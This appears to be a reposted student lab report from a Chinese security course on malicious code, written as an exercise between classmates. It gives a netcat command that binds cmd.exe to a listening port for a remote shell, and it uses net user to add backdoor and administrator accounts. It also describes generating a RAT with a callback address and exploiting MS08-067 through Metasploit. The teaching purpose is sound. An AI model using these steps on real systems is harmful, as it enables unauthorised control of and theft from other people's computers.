网络对抗技术—-网络对抗实验四
學???號:201421430008
?
中國人民公安大學
Chinese people’?public security university
?
網絡對抗技術
實驗報告
?
| 實驗四 |
| 惡意代碼技術 |
?
?
?
| 學生姓名 | ?吳宙楊 |
| 年級 | ?2014 |
| 區隊 | ?3 |
| 指導教師 | ?高見老師 |
?
?
信息技術與網絡安全學院
2016年11月7日
?
實驗任務總綱
2016—2017?學年?第?一?學期
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關知識,加深對木馬的安全防范意識。
?
2.了解并熟悉常用的網絡攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。
2.文檔要求結構清晰,圖文表達準確,標注規范。推理內容客觀、合理、邏輯性強。
3.軟件工具可使用NC、MSF等。
4.實驗結束后,保留電子文檔。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉并準備好實驗用的軟件工具,按照實驗內容和要求提前做好實驗內容的準備。
2.實驗環境
描述實驗所使用的硬件和軟件環境(包括各種軟件工具);
開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。
3.實驗過程
1)啟動系統和啟動工具軟件環境。
2)用軟件工具實現實驗內容。
4.實驗報告
按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規定的書寫格式書寫,表格要有表說圖形要有圖說。
?
任務一 利用NC控制電腦
?
?NetCat,具有網絡軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟件大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。
?
實驗過程需要兩個同學相互配合完成:
?
步驟一:
?
???在受害者的機器 (同學A)
輸入下面的命令:
nc.exe?-l -p port -e cmd.exe ??進入監聽模式
?
?
步驟二:
在攻擊者的機器.(同學B)
輸入下面的命令:
nc ip??port //連接victim_IP,然后得到一個shell。?(需要截圖)
?
?
?
?
步驟三:
?
????在shell中,利用net user?用戶名 密碼?/add?,添加一個用戶,并在受害者的機器中使用?net user?命令進行驗證。(需要截圖)
?
?
?
?
?可以繼續通過命令行做一些事情。
?
任務二 利用木馬控制電腦
?
實驗過程需要兩個同學配合:
?
步驟一:
?
??? 攻擊者的機器. (同學A)
打開V2014.exe程序或則star RAT,這兩個木馬功能類似。
?
?
?
步驟二:
點擊菜單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和端口號,并點擊“生成”按鈕,生成木馬服務端。
?
?
?
?
步驟三:
?
將生成的木馬可執行程序拷貝到受害者的機器,并雙擊運行。?
?
步驟四:
?
在控制端中查看木馬上線情況,并對以下功能每個進行測試和截圖。?
?
1、控制主機
?2、獲取桌面
3、拷貝文件
4、鍵盤記錄
6、重啟電腦
任務三 通過漏洞獲取shell(合天平臺中做)?所有過程截圖寫博客
?windows ms08067 漏洞利用
在平臺中獲取shell之后,繼續利用攻擊機器使用
net user user pass /add
net localgroup administrators /add
命令向被攻擊的機器中添加賬戶,并提升為管理員
然后用rdesktop 10.1.1.130 登陸對方的遠程桌面
?
關閉xp系統主機的防火墻
查看攻擊主機的ip地址和賬戶
? 啟動Armitage
?
檢索10.1.1.0/24網段
?
對130進行檢測
搜尋到適應的攻擊模塊
?
?配置攻擊信息
?
利用Metasploit shall獲得xp主機的管理員權限
?
利用cmd shall建立attacker的賬戶
?
利用rdesktop遠程登錄xp系統的attacker(密碼:123465)
轉載于:https://www.cnblogs.com/P201421430008/p/7751529.html
總結
以上是生活随笔為你收集整理的网络对抗技术—-网络对抗实验四的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 大公司里怎样开发和部署前端代码
- 下一篇: UVA3942 Remember the